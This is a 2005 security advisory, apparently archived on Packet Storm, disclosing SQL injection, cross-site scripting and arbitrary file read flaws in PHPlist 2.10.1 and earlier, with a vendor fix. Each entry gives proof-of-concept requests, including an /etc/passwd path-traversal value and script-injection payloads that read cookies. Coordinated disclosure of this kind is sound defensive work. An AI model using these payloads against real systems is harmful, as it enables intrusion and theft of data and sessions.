what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

tkadv2005-11-001.txt

tkadv2005-11-001.txt
Posted Nov 8, 2005
Authored by Tobias Klein | Site trapkit.de

PHPlist Version 2.10.1 and prior contain multiple Cross Site Scripting and SQL Injection vulnerabilities. Furthermore it is possible to access and read arbitrary system files through a vulnerability in PHPlist. Detailed exploitation provided.

tags | advisory, arbitrary, vulnerability, xss, sql injection
SHA-256 | 429d5e2ed3062111670608399cbfe4c23936e0a7acc764e78fbed068284c5240

tkadv2005-11-001.txt

Change Mirror Download

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Advisory: Multiple vulnerabilities in PHPlist
Name: TKADV2005-11-001
Revision: 1.0
Release Date: 2005/11/07
Last Modified: 2005/11/07
Author: Tobias Klein (tk at trapkit.de)
Affected Software: PHPlist (all versions <= 2.10.1)
Risk: Critical ( ) High (x) Medium (x) Low (x)
Vendor URL: http://www.phplist.com/
Vendor Status: Vendor has released an updated version


=========
Overview:
=========

PHPlist is a double opt-in newsletter manager. It is written in
PHP and uses a SQL database for storing the information.

Version 2.10.1 and prior contain multiple Cross Site Scripting
and SQL Injection vulnerabilities. Furthermore it is possible to
access and read arbitrary system files through a vulnerability in
PHPlist.


======================
Vulnerability details:
======================

All vulnerabilites are only exploitable by a legitimate user who is
logged in to PHPlist. So the probability of occurrence of most
threats is rated as medium. The probability of occurrence of the
non-persistent Cross Site Scripting vulnerabilities is even rated
as low.

For a description of the calculation of the resulting threat of a
vulnerability see reference [3].

All vulnerabilities are exploitable, no matter if magic_quotes_gpc
is turned on or off.


[1] SQL Injection

Possible damage: Critical
Probability of occurrence: Medium
Resulting threat: High

HTTP method: GET

Vulnerability description:

PHPlist is prone to a SQL injection vulnerability. This issue is
due to a lack of proper sanitization of user-supplied input before
using it in an SQL query.

Successful exploitation could result in a compromise of the
application, disclosure or modification of data, or may permit an
attacker to exploit vulnerabilities in the underlying database
implementation.

Vulnerable URL:

[path_to_phplist]/lists/admin/?page=admin&id=

Proof of Concept:

[path_to_phplist]/lists/admin/?page=admin&id=1'


[2] SQL Injection

Possible damage: Critical
Probability of occurrence: Medium
Resulting threat: High

HTTP method: GET

Vulnerability description:

PHPlist is prone to a SQL injection vulnerability. This issue is
due to a lack of proper sanitization of user-supplied input before
using it in an SQL query.

Successful exploitation could result in a compromise of the
application, disclosure or modification of data, or may permit an
attacker to exploit vulnerabilities in the underlying database
implementation.

Vulnerable URL:

[path_to_phplist]/lists/admin/?page=editattributes&id=

Proof of Concept:

[path_to_phplist]/lists/admin/?page=editattributes&id=1'


[3] SQL Injection

Possible damage: Critical
Probability of occurrence: Medium
Resulting threat: High

HTTP method: POST

Vulnerability description:

PHPlist is prone to a SQL injection vulnerability. This issue is
due to a lack of proper sanitization of user-supplied input before
using it in an SQL query.

Successful exploitation could result in a compromise of the
application, disclosure or modification of data, or may permit an
attacker to exploit vulnerabilities in the underlying database
implementation.

Vulnerable URL:

[path_to_phplist]/lists/admin/?page=admin&id=1

Vulnerable POST parameter: id=

Proof of Concept (POST request):

POST [path_to_phplist]/lists/admin/?page=admin&id=1 HTTP/1.1

[...]

id=1'&loginname=admin&email=&password=phplist&superuser=1&
disabled=0&change=Save+Changes


[4] Read arbitrary system files

Possible damage: Critical
Probability of occurrence: Medium
Resulting threat: High

HTTP method: POST

Vulnerability description:

PHPlist is prone to a vulnerability that permits read access to
arbitrary files.

Successful exploitation of this vulnerability will grant the
attacker read access to arbitrary files on the system in the
security context of the webserver process.

Details:

(a) Configure attributes

Go to the following URL:

[path_to_phplist]/lists/admin/?page=attributes

Now load data from predefined defaults (see following URL).

[path_to_phplist]/lists/admin/?page=defaults

(b) Add predefined value

For example: "Provinces in Canada"

(c) Manipulate POST request

Vulnerable POST parameter: selected%5B%5D=
Original value : selected%5B%5D=can-provinces.txt

Manipulated value:

selected%5B%5D=/../../../../../../../etc/passwd

POST request:

POST [path_to_phplist]/lists/admin/?page=defaults HTTP/1.1

[...]

selected%5B%5D=/../../../../../../../etc/passwd

(d) Check

Go to the user management:

[path_to_phplist]/lists/admin/?page=usermgt

Choose the "Control values for" link:

[path_to_phplist]/lists/admin/?page=editattributes&id=1

You should see the contents of the local password file.


[5] Cross Site Scripting

Possible damage: High
Probability of occurrence: Medium
Resulting threat: Medium

HTTP method: POST

Vulnerability description:

The "listname" parameter is prone to cross-site scripting attacks.
This could permit an attacker to embed a malicious link into the
context of the web application that includes hostile client-side
script code or HTML. If the appropriate site within the application
is visited, the attacker-supplied code is rendered in the browser
of the user who visits the site. No further user interaction is
needed.

URL with vulnerable POST request:

[path_to_phplist]/lists/admin/?page=editlist

Details:

(a) Manipulate POST request

Vulnerable POST parameter: listname=
Original value : listname=

Manipulated value:

listname="><script>alert(document.cookie)</script>

POST request:

POST [path_to_phplist]/lists/admin/?page=editlist HTTP/1.1

[...]

id=0&listname="><script>alert(document.cookie)</script>
&listorder=&owner=1&description=&save=Save

(b) Check

The malicious code gets executed when a user visits the following
URL:

[path_to_phplist]/lists/admin/?page=list


[6] Cross Site Scripting

Possible damage: High
Probability of occurrence: Medium
Resulting threat: Medium

HTTP method: POST

Vulnerability description:

The "title" parameter is prone to cross-site scripting attacks.
This could permit an attacker to embed a malicious link into the
context of the web application that includes hostile client-side
script code or HTML. If the appropriate site within the application
is visited, the attacker-supplied code is rendered in the browser
of the user who visits the site. No further user interaction is
needed.

URL with vulnerable POST Request:

[path_to_phplist]/lists/admin/?page=spageedit

Details:

(a) Manipulate POST request

Vulnerable POST parameter: title=
Original value : title=

Manipulated value:

title=><script>alert(document.cookie)</script>

POST request:

POST [path_to_phplist]/lists/admin/?page=spageedit HTTP/1.1

[...]

id=3&title="><script>alert(document.cookie)</script>&[...]

(b) Check

The malicious code gets executed when a user visits the following
URL:

[path_to_phplist]/lists/admin/?page=spage


[7] Cross Site Scripting

Possible damage: High
Probability of occurrence: Medium
Resulting threat: Medium

HTTP method: POST

Vulnerability description:

The "title" form-data is prone to cross-site scripting attacks.
This could permit an attacker to embed a malicious link into the
context of the web application that includes hostile client-side
script code or HTML. If the appropriate site within the application
is visited, the attacker-supplied code is rendered in the browser
of the user who visits the site. No further user interaction is
needed.

URL with vulnerable POST Request:

[path_to_phplist]/lists/admin/?page=template

Details:

(a) Manipulate POST request

Vulnerable POST parameter: form-data; name="title"

Manipulated value:

form-data; name="title"

"><script>alert(document.cookie)</script>

POST request:

POST [path_to_phplist]/lists/admin/?page=template HTTP/1.1

[...]

-----------------------------1474118359509
Content-Disposition: form-data; name="id"

0
-----------------------------1474118359509
Content-Disposition: form-data; name="title"

"><script>alert(document.cookie)</script>
-----------------------------1474118359509
Content-Disposition: form-data; name="file_template";
filename=""
Content-Type: application/octet-stream


-----------------------------1474118359509
Content-Disposition: form-data; name="content"

[CONTENT]
-----------------------------1474118359509
Content-Disposition: form-data; name="save"

Save Changes
-----------------------------1474118359509--

(b) Check

The malicious code gets executed when a user visits the following
URL:

[path_to_phplist]/lists/admin/?page=templates


[8] Cross Site Scripting

Possible damage: Medium
Probability of occurrence: Low
Resulting threat: Low

HTTP method: GET

Vulnerability description:

The "?page=eventlog&s=0&filter=" parameter is prone to cross-site
scripting attacks. This could permit remote attackers to create a
malicious link to a vulnerable PHP script that includes hostile
client-side script code or HTML. If this link is visited, the
attacker-supplied code may be rendered in the browser of the user
who visit the malicious link.

Proof of Concept:

[path_to_phplist]/lists/admin/?page=eventlog&s=0&filter="><script>
alert(document.cookie)</script>


[9] Cross Site Scripting

Possible damage: Medium
Probability of occurrence: Low
Resulting threat: Low

HTTP method: GET

Vulnerability description:

The "?page=eventlog&start=&delete=" parameter is prone to cross-site
scripting attacks. This could permit remote attackers to create a
malicious link to a vulnerable PHP script that includes hostile
client-side script code or HTML. If this link is visited, the
attacker-supplied code may be rendered in the browser of the user
who visit the malicious link.

Proof of Concept:

[path_to_phplist]/lists/admin/?page=eventlog&start=&delete=">
<script>alert(document.cookie)</script>


[10] Cross Site Scripting

Possible damage: Medium
Probability of occurrence: Low
Resulting threat: Low

HTTP method: GET

Vulnerability description:

The "?page=eventlog&start=" parameter is prone to cross-site
scripting attacks. This could permit remote attackers to create a
malicious link to a vulnerable PHP script that includes hostile
client-side script code or HTML. If this link is visited, the
attacker-supplied code may be rendered in the browser of the user
who visit the malicious link.

Proof of Concept:

[path_to_phplist]/lists/admin/?page=eventlog&start="><script>alert
(document.cookie)</script>


[11] Cross Site Scripting

Possible damage: Medium
Probability of occurrence: Low
Resulting threat: Low

HTTP method: GET

Vulnerability description:

The "?page=configure&id=" parameter is prone to cross-site
scripting attacks. This could permit remote attackers to create a
malicious link to a vulnerable PHP script that includes hostile
client-side script code or HTML. If this link is visited, the
attacker-supplied code may be rendered in the browser of the user
who visit the malicious link.

Proof of Concept:

[path_to_phplist]/lists/admin/?page=configure&id="><script>alert
(document.cookie)</script>


[12] Cross Site Scripting

Possible damage: Medium
Probability of occurrence: Low
Resulting threat: Low

HTTP method: GET

Vulnerability description:

The "?page=users&find=" parameter is prone to cross-site
scripting attacks. This could permit remote attackers to create a
malicious link to a vulnerable PHP script that includes hostile
client-side script code or HTML. If this link is visited, the
attacker-supplied code may be rendered in the browser of the user
who visit the malicious link.

Proof of Concept:

[path_to_phplist]/lists/admin/?page=users&find="><script>alert
(document.cookie)</script>


[13] Cross Site Scripting

Possible damage: Medium
Probability of occurrence: Low
Resulting threat: Low

HTTP method: GET

Vulnerability description:

The "?page=admin&start=" parameter is prone to cross-site
scripting attacks. This could permit remote attackers to create a
malicious link to a vulnerable PHP script that includes hostile
client-side script code or HTML. If this link is visited, the
attacker-supplied code may be rendered in the browser of the user
who visit the malicious link.

Proof of Concept:

[path_to_phplist]/lists/admin/?page=admin&start="><script>alert
(document.cookie)</script>


[14] Cross Site Scripting

Possible damage: Medium
Probability of occurrence: Low
Resulting threat: Low

HTTP method: GET

Vulnerability description:

The "?page=fckphplist&action=" parameter is prone to cross-site
scripting attacks. This could permit remote attackers to create a
malicious link to a vulnerable PHP script that includes hostile
client-side script code or HTML. If this link is visited, the
attacker-supplied code may be rendered in the browser of the user
who visit the malicious link.

Proof of Concept:

[path_to_phplist]/lists/admin/?page=fckphplist&action="><script>
alert(document.cookie)</script>


=========
Solution:
=========

Upgrade to PHPlist 2.10.2 or newer.

http://www.phplist.com/files/


========
History:
========

2005/11/02 - Vendor notified
2005/11/02 - Vendor response
2005/11/07 - Release of new PHPlist version
2005/11/07 - Public release


========
Credits:
========

Vulnerabilities found and advisory written by Tobias Klein.


===========
References:
===========

[1] http://tincan.co.uk/?lid=1632
[2] http://www.trapkit.de/advisories/TKADV2005-11-001.txt
[3] http://www.trapkit.de/advisories/TKADVcortav.txt


========
Changes:
========

Revision 0.1 - Initial draft release to the vendor
Revision 1.0 - Public release


===========
Disclaimer:
===========

The information within this advisory may change without notice. Use
of this information constitutes acceptance for use in an AS IS
condition. There are no warranties, implied or express, with regard
to this information. In no event shall the author be liable for any
direct or indirect damages whatsoever arising out of or in connection
with the use or spread of this information. Any use of this
information is at the user's own risk.
The copyright for any material created by the author is reserved. Any
duplication of codes or texts provided here in electronic or printed
publications is not permitted without the author's agreement.


==================
PGP Signature Key:
==================

http://www.trapkit.de/advisories/tk-advisories-signature-key.asc


Copyright 2005 Tobias Klein. All rights reserved.


-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQA/AwUBQ2+pdpF8YHACG4RBEQLtgwCgr/c/Vf73SpIWq+yeChp9r15oHi0AnRJS
OYPcgyVchLXfFZE912nenHcE
=MG/M
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close